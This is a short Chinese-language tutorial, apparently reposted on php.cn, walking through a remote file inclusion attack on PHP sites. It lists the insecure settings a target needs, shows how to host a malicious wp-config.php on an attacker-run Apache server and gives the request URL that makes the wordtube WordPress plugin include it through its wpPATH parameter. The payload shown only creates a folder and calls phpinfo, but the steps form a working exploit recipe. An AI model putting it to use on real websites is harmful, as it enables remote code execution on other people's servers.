> 백엔드 개발 > PHP 튜토리얼 > 修改部分php配置实现 远程包含 攻击

修改部分php配置实现 远程包含 攻击

WBOY
풀어 주다: 2016-06-23 14:37:31
원래의
1024명이 탐색했습니다.

1. 调试期间,可以打开display_errors = On

2. 目标机使用了include、require或require_once

3. 目标机配置

  a) register_globals = On

  b) allow_url_fopen = On

  c) allow_url_include = On

这样的目标就可以进行攻击了

自己搭建简易的服务器,apache + php 即可

修改httpd.conf中,将后缀为php的,从而避免代码在攻击端就被执行,

#AddType application/x-httpd-php .php .html .htm

根据漏洞代码,生成对应的环境,例如:

if (!$_POST) $wppath=$_GET['wpPATH'];

else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php');

我们就可以建立一个可访问的文件夹bad_guy,

增加读权限order allow,deny allow from all ,

然后在里面新建一个wp-config.php

<?php        mkdir('c:\exploit');        phpinfo();        exit;?>
로그인 후 복사

~然后请求一下就行了

/wordpress/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://10.67.1.30/bad_guy

来张效果图:

원천:php.cn
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿